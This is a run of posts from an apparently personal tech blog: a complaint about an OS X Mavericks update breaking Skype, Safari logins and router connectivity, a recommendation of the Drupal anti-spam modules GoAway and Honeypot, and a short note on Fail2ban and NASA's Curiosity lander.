The reason for doing this update was that my friend needed the speech to text capability that is now part of Maverick. A bit on that later, as all was not as it seemed with that application.</p> <p>So the update downloaded, and the MacBook updated to OS X 10.9, after more post-update updates. Maverick, BTW, has a definition as an adjective of "unorthodox". There was nothing but problems after the update. The most notable one was that applications no longer worked. Applications such as Skype, which are critical for home businesses. Following the Skype install directions, verbatim, resulted in a window that said the application was installed incorrectly. Secondly, Safari lost its information, so that, as example, if you had Netflix, you no longer were able to log into the service afterwards, and had to go find your login information from, hopefully, notes you took. Then there was a disturbing blanking of the screen that occurred when one started or closed applications. A more subtle but operationally critical problem that really gives you pause is that the router that worked perfectly previous to the update no longer worked correctly after the update. The router in question is a D-Link DIR-615. It works perfectly with other non-Apple products, but not with an iPad (<em>not consistently</em>), or with the MacBook after upgrading to OS X 10.9. What works correctly now? An Ethernet cable, or an Apple Airport. Really?</p> <p>The final result of all this was that my friend had to take the MacBook to the MacShack to get MacLove given to it (<em>such as a down-rev Skype application</em>). They did get the MacBook post-update fixed, at least to the point where Skype installed and worked correctly. There was a spiel about the hard drive possibly being bad, but the hard drive was FINE prior to the update to Maverick. It wound up testing OK, BTW.</p> <p>Has Apple <u><em><strong>lost</strong></em></u> its collective mind? 
A free update that causes a trip to the MacShack? You've got to be kidding us… No wonder it's a free update. Nobody would pay for it, LOL, they would be asking for their money back if they did, at minimum. A note on the Dictation application, that started this update process. What Apple fails to advertise is that it is <em>cloud</em> software, not an application that is installed on your MacBook. To me, that seems a little bit on the snaky side. My opinion on all of this is that with the passing of Stephen, Apple assumed the business paradigms of Microsoft. God help all Apple customers if that is the case. And Praise the Lord for Linux in all of its versions.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Sat, 11/09/2013 - 21:09</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/77" hreflang="en">Apple</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/78" hreflang="en">OS-X</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/79" hreflang="en">Maverick</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/80" hreflang="en">Update</a></div> </div> </div> Sun, 10 Nov 2013 04:09:16 +0000 AlReaud 51 at http://happycattech.com http://happycattech.com/index.php/maverick-update-not-recommended#comments Two great DRUPAL modules to stop harassing spammers http://happycattech.com/index.php/drupal-tips-and-tricks/modules-stop-spammers <span class="field field--name-title field--type-string 
field--label-hidden">Two great DRUPAL modules to stop harassing spammers</span> <div class="field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><span class="royal">Updated: 10/10/2016</span></p> <p>If you operate a content management system (CMS), you're probably familiar with the curse of botnet attacks on the user registration and persistent spammers on comments. These are IP addresses that are attached to your CMS from China, i.e. the <a href="http://www.163.com/" target="_blank">163.com</a> domain, sending regular, daily spam message updates about Viagra, Cialis, and faux haute couture, sometimes for years on end. Or they continuously try to attack the user registration CAPTCHA, trying to create accounts to do the same or worse, sometimes using inane responses to the CAPTCHA like "<span style="color:#8b4513;"><em>TooBad1</em></span>" through "<span style="color:#8b4513;"><em>TooBad257</em></span>", not really doing any damage but consuming sometimes scarce resources and filling up the logs (<em>to mask other activity sometimes, like database attacks</em>).</p> <p>This is not a problem specific to any one CMS, and will happen to Drupal, WordPress, or Joomla. Drupal, however, logs the events as part of core functionality, allowing them to be noticed by the operator. Having dealt with it for well over a year, mostly manually, I found two great modules in the Drupal repository to help curtail the intrusions and the waste of your time as operator. 
In my case <a href="http://en.wikipedia.org/wiki/Bastard_Operator_From_Hell" target="_blank">BOFH</a>… <img alt="wink" height="23" src="/libraries/smiley/images/wink_smile.png" title="wink" width="23" /></p> <p><strong>GoAway (<span class="warning">currently Drupal 7 only</span>)</strong></p> <blockquote> <p><a href="https://www.drupal.org/project/goaway" target="_blank">https://www.drupal.org/project/goaway</a><br /> Allows for IP banning from the spam comment view, with the miscreant IP forwarded to the URL of your choice. I've not fully experimented with the extent of the banning, however, I don't believe it's as extensive as the Add Rule ban, which is total. This should be reserved for those recursive spammers who just insist on sending you info on how to enlarge your manliness, etc…</p> </blockquote> <p><strong>Honeypot</strong></p> <blockquote> <p><a href="https://www.drupal.org/project/honeypot" target="_blank">https://www.drupal.org/project/honeypot</a><br /> Uses <a href="http://www.sans.org/reading_room/whitepapers/detection/fundamental-honeypotting_2054" target="_blank">honeypotting (PDF whitepaper)</a> techniques to help prevent intrusion by botnets on comment, content, and user registration/password reset forms. This module will not stop intrusion attempts, however it will make them less effective and more cumbersome. It has good control and decreases faux comment and faux user registrations significantly on sites that have those enabled. On this site it's used for comments only, as user registration is disabled. 
Visitors can bang away at user registration and get access denied every time.</p> </blockquote> <p>The implementation of both the above, along with <a href="https://www.drupal.org/project/captcha" target="_blank">text and image CAPTCHA</a> and/or <a href="https://www.drupal.org/project/recaptcha" target="_blank">reCAPTCHA</a>, has allowed opening up sites to anonymous commenting while retaining tight control on user registration and authenticated user access. Well worth checking their applicability for your Drupal site if you're having the spam/fake account problem.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Tue, 03/26/2013 - 21:17</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/34" hreflang="en">Drupal</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/35" hreflang="en">Tips</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/39" hreflang="en">Module</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/41" hreflang="en">Spam Control</a></div> </div> </div> Wed, 27 Mar 2013 03:17:57 +0000 AlReaud 28 at http://happycattech.com http://happycattech.com/index.php/drupal-tips-and-tricks/modules-stop-spammers#comments Out of Lurking for Curiosity http://happycattech.com/index.php/out-of-lurking-for-curiosity-lander <span class="field field--name-title field--type-string field--label-hidden">Out of Lurking for Curiosity</span> <div class="field field--name-body field--type-text-with-summary 
field--label-hidden field__item"><p>Months go by and nothing gets written because not much changes. The Gnome 3 interface doesn't lock up as much on restart, but normally does so on logout. The attacks on the shell are futile, and <a href="http://www.fail2ban.org/wiki/index.php/Main_Page" target="_blank">Fail2ban</a> does a good job of making them futile. So there's not much to write about.</p> <p>Curiosity, the <a href="http://mars.jpl.nasa.gov/msl/" target="_blank">Mars Science Lander</a> (MSL), is another story. At ~900kg, it's a behemoth, the biggest lander placed on another planet successfully. The <a href="http://mars.jpl.nasa.gov/msl/multimedia/interactives/edlcuriosity/index-2.html" target="_blank">landing techniques</a> were novel, requiring aerobraking, supersonic parachuting, retrorockets and finally a sky-crane winch-down of the lander itself. Pretty phenomenal...</p> <p>What will we find there, with a real lander that is more like a nuclear powered 6-wheel ATV? There is no telling, but we await expectantly! So congratulations to NASA and the MSL team, great job done getting us there. 
Now the task is finding out where the water went.</p> </div> <span><span lang="" about="/index.php/user/1" typeof="schema:Person" property="schema:name" datatype="">AlReaud</span></span> <span>Tue, 08/07/2012 - 21:12</span> <div class="field field--name-field-tags field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class="field__items"> <div class="field__item"><a href="/index.php/taxonomy/term/82" hreflang="en">Mars</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/83" hreflang="en">Curiosity</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/84" hreflang="en">Lander</a></div> <div class="field__item"><a href="/index.php/taxonomy/term/85" hreflang="en">Lurking</a></div> </div> </div> Wed, 08 Aug 2012 03:12:24 +0000 AlReaud 53 at http://happycattech.com http://happycattech.com/index.php/out-of-lurking-for-curiosity-lander#comments